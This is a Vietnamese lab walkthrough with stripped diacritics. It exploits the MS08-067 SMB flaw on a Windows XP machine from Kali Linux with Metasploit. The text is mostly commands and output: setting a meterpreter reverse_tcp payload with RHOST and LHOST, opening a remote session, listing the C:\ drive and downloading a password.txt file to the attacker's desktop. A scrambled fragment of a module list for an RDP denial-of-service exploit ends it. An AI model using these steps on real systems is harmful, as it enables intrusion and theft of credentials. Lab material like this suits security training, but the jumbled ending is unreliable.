Академический Документы
Профессиональный Документы
Культура Документы
1. Chun b
- My o Kali Linux:
+ IP: 192.168.1.225
- My o XP:
+ IP: 192.168.1.226
+ Thc hin shared folder trn my XP
chng ta c 4 buoc chinh
dau tien la use exploit -> set payload (tao backdoor)
sau chng ta s set LHOST v RHOST
2. Khai thc m li ms08-067 ti my Kali Linux
- Khi ng chng trnh metasploit
root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.226 my b tn cng
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.225 my tn cng
msf exploit(ms08_067_netapi) > set target 6
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.225:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (882688 bytes) to 192.168.1.226
[*] Meterpreter session 1 opened (192.168.1.225:4444 -> 192.168.1.226:1045) at 2015-05-29 03:07:05 -0700
meterpreter >
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd C:\\
meterpreter > pwd
C:\
meterpreter > dir
[-] Unknown command: dir.
meterpreter > ls
Listing: C:\
============
Mode
Size
Type Last modified
Name
---------- ---------------100777/rwxrwxrwx 0
fil 2011-06-22 21:45:05 -0700 AUTOEXEC.BAT
100666/rw-rw-rw- 0
fil 2011-06-22 21:45:05 -0700 CONFIG.SYS
40777/rwxrwxrwx 0
dir 2011-06-22 21:51:32 -0700 Documents and Settings
100444/r--r--r-- 0
fil 2011-06-22 21:45:05 -0700 IO.SYS
100444/r--r--r-- 0
fil 2011-06-22 21:45:05 -0700 MSDOS.SYS
100555/r-xr-xr-x 47564
fil 2004-08-03 14:38:34 -0700 NTDETECT.COM
40555/r-xr-xr-x 0
dir 2011-06-22 21:54:29 -0700 Program Files
40777/rwxrwxrwx 0
dir 2015-05-29 18:22:02 -0700 RECYCLER
40777/rwxrwxrwx 0
dir 2015-05-29 18:22:21 -0700 Shared
40777/rwxrwxrwx 0
dir 2011-06-22 21:50:55 -0700 System Volume Information
40777/rwxrwxrwx 0
dir 2015-05-29 19:06:01 -0700 WINDOWS
100666/rw-rw-rw- 211
fil 2011-06-22 21:41:17 -0700 boot.ini
100444/r--r--r-- 250032 fil 2004-08-03 14:59:34 -0700 ntldr
100666/rw-rw-rw- 805306368 fil 2015-05-29 20:32:45 -0700 pagefile.sys
100666/rw-rw-rw- 9
fil 2015-05-29 20:35:48 -0700 password.txt
meterpreter > download password.txt /root/Desktop
[*] downloading: password.txt -> /root/Desktop/password.txt
================
Name
----
--------------- ----
Description
-----------
auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16
020 Microsoft Remote Desktop Use-After-Free DoS
auxiliary/scanner/rdp/ms12_020_check
Remote Desktop Checker
normal MS12-
yes
yes